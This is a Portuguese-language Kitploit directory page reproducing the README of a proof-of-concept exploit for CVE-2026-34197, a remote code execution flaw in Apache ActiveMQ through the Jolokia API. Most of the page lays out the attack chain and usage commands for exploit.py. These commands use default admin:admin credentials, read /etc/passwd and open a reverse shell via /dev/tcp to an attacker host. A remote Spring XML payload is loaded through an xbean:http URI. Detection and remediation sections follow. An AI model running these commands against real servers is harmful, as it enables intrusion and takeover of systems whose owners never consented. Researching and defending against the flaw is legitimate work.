Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-34197 — Prova de conceito de exploit para CVE-2026-34197, uma RCE no Apache ActiveMQ via API Jolokia. Inclui um exploit em Python, modelo de payload e laboratório Docker para testes e pesquisa. | Kitploit
Ferramentas/GitHubGitHub/devsecurityspro/cve-2026-34197
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingLabs e Prática
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

Prova de conceito de exploit para CVE-2026-34197, uma RCE no Apache ActiveMQ via API Jolokia. Inclui um exploit em Python, modelo de payload e laboratório Docker para testes e pesquisa.

Ver Repositório
4há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-34197 — Apache ActiveMQ RCE via API Joloka

Descrição

CVE-2026-34197 é uma vulnerabilidade de execução remota de código (RCE) no Apache ActiveMQ Classic que permite a um atacante executar comandos arbitrários no sistema operacional do servidor através da API Jolokia exposta no console web.

A vulnerabilidade existe há mais de 13 anos e reside na interação entre múltiplos componentes: Jolokia (ponte HTTP-JMX), os MBeans do ActiveMQ, os conectores de rede e o transporte VM.

Informações da Vulnerabilidade

CampoDetalhe
CVE IDCVE-2026-34197
TipoRCE (Remote Code Execution)
CWECWE-20 (Validação de entrada incorreta), CWE-94 (Injeção de código)
Versões afetadasActiveMQ Classic < 5.19.4, 6.0.0 — 6.2.2
Versões corrigidas5.19.4, 6.2.3
Autenticação necessáriaSim (credenciais padrão admin:admin comuns)
Sem autenticação em6.0.0 — 6.1.1 (por CVE-2024-32114)
Porta padrão8161 (console web)

Mecanismo de Exploração

A cadeia de ataque funciona assim:

  1. O atacante envia uma requisição POST para /api/jolokia/ invocando a operação addNetworkConnector do MBean do broker.
  2. O argumento contém um URI com transporte vm:// que referencia um broker inexistente.
  3. O ActiveMQ tenta criar esse broker em tempo real e aceita o parâmetro brokerConfig que aponta para uma URL remota.
  4. O esquema xbean: indica que o recurso é um arquivo de configuração Spring XML.
  5. O Spring instancia todos os beans definidos no XML, incluindo um que executa Runtime.getRuntime().exec().
  6. O comando arbitrário é executado no servidor.
root@kitploit:~
Atacante                          ActiveMQ (vítima)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ATACANTE/x.xml)  |
   |                                    |
   |                                    |-- Cria broker VM
   |                                    |-- Baixa x.xml
   |<-- GET /x.xml --------------------|
   |-- Responde com payload XML ------>|
   |                                    |-- Spring instancia beans
   |                                    |-- Runtime.exec(COMANDO)
   |                                    |

Estrutura do Projeto

root@kitploit:~
CVE-2026-34197/
├── README.md              # Este arquivo
├── exploit.py             # PoC principal
├── payloads/
│   └── template.xml       # Template do payload Spring XML
├── docker/
│   └── docker-compose.yml # Ambiente de laboratório vulnerável
└── LICENSE

Requisitos

  • Python 3.8+
  • Módulos: requests, http.server, argparse (stdlib)
  • Acesso de rede à porta 8161 do alvo
  • Docker e Docker Compose (opcional, para o laboratório)
root@kitploit:~
pip install requests

Uso

1. Subir o ambiente vulnerável (opcional)

root@kitploit:~
cd docker
docker-compose up -d

Isso sobe um ActiveMQ Classic 5.18.6 vulnerável em localhost:8161.

2. Executar o exploit

root@kitploit:~
# Uso básico com credenciais padrão
python exploit.py -t http://ALVO:8161 -l IP_ATACANTE -c "id"

# Especificar credenciais
python exploit.py -t http://ALVO:8161 -l IP_ATACANTE -c "whoami" -u admin -p admin

# Especificar porta do servidor HTTP do payload
python exploit.py -t http://ALVO:8161 -l IP_ATACANTE -lp 9999 -c "cat /etc/passwd"

# Modo sem autenticação (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://ALVO:8161 -l IP_ATACANTE -c "id" --no-auth

# Shell reversa
python exploit.py -t http://ALVO:8161 -l IP_ATACANTE -c "bash -i >& /dev/tcp/IP_ATACANTE/4444 0>&1"

Parâmetros

ParâmetroDescrição
-t, --targetURL base do alvo (ex: http://10.0.0.1:8161)
-l, --lhostIP do atacante para servir o payload XML
-lp, --lportPorta do servidor HTTP local (padrão: 8888)
-c, --commandComando a executar no alvo
-u, --userUsuário (padrão: admin)
-p, --passwordSenha (padrão: admin)
--no-authNão enviar credenciais (para versões 6.0.0 - 6.1.1)
--broker-nameNome do broker (padrão: localhost)

Detecção

Indicadores nos logs do broker ActiveMQ:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

Outros indicadores:

  • Requisições POST para /api/jolokia/ com addNetworkConnector no corpo
  • Conexões HTTP de saída do processo do ActiveMQ para hosts inesperados
  • Processos filhos inesperados gerados pelo processo Java do ActiveMQ

Remediação

  • Atualizar para ActiveMQ Classic 5.19.4 ou 6.2.3
  • Alterar as credenciais padrão do console web
  • Restringir o acesso de rede à porta 8161
  • Monitorar os logs do broker em busca de URIs vm:// com brokerConfig=xbean:http

Referências

  • NVD — CVE-2026-34197
  • Horizon3 — Análise técnica
  • Apache ActiveMQ — Aviso de segurança
  • CVE-2024-32114 — Jolokia sem autenticação
  • CVE-2023-46604 — RCE OpenWire (CISA KEV)

Autor

Criado por KONDOR DEV SECURITY

Telegram

Aviso Legal

Este PoC é fornecido exclusivamente para fins educacionais e de pesquisa em segurança. O uso desta ferramenta contra sistemas sem autorização explícita é ilegal. O autor não se responsabiliza pelo uso indevido desta ferramenta.

Licença

MIT — Copyright (c) 2026 KONDOR DEV SECURITY

Baixar ferramenta